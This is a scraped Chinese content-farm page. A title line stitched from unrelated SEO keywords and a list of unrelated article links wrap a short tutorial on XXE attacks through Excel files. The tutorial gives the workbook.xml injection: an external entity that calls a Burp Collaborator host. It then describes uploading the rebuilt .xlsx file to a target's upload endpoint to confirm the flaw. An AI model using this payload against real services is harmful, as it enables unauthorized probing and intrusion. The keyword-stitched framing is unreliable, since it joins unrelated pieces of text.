当前位置: 首页 > news >正文

电子商务网站开发目标乐清网吧

电子商务网站开发目标,乐清网吧,dede 网站地图 文章,源码用 wordpress打开利用EXCEL进行XXE攻击 原因 原因 Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。 我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是…

利用EXCEL进行XXE攻击

  • 原因

原因

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。

我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

在这里插入图片描述
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录

http://www.yayakq.cn/news/37810/

相关文章:

  • 做的新网站能用多久游戏推广引流
  • 搭建公司网站费用网络公司 给 客户网站备案
  • 重庆所有做网站的公司潍坊定制网站搭建
  • 一定seo自己网站吗单页网站 jquery
  • 网站建设概要设计水果网络营销策划书
  • 保定网站制作系统云南工贸网站建设
  • 网站首页模块建设如何更新网站
  • 建设网站需要的工具天元建设集团有限公司商票逾期
  • 住房城乡与建设厅网站首页长沙网站网站建设
  • 加拿大28怎么做网站代理good work wordpress
  • 广州做网站哪个好前端可以做网站吗
  • 学校门户网站的作用学编程的网课平台
  • 行政机关网站建设wordpress爆破
  • 那里建站好把html文件生成网址
  • 网站推广排名张槎建网站公司
  • 如何修改上线网站开发区人才市场招聘信息最新招聘
  • 北京网站建设qq群临安做网站的公司
  • 做网站数据库怎么整做徽章的企业网站
  • 外汇自动跟单网站开发ui设计师做网站
  • 动易网站默认密码wordpress 重定向插件
  • html网站模仿腾讯域名
  • 男女做暧暧网站免费网络设计培训
  • asp.net网站设计型网站建设
  • 网站建设价格烟台网站开发公司
  • 教育网站建设策划书企业网站每年的费用
  • 网站开发技术三大件网络营销的八大能力
  • 公司有网站域名后如何建网站营销广告文案
  • 网站标题是关键词吗如何保护我做的网站模板
  • 余姚厂家高端网站设计公众号编辑器下载
  • 秦皇岛网站制作报价电脑版浏览器入口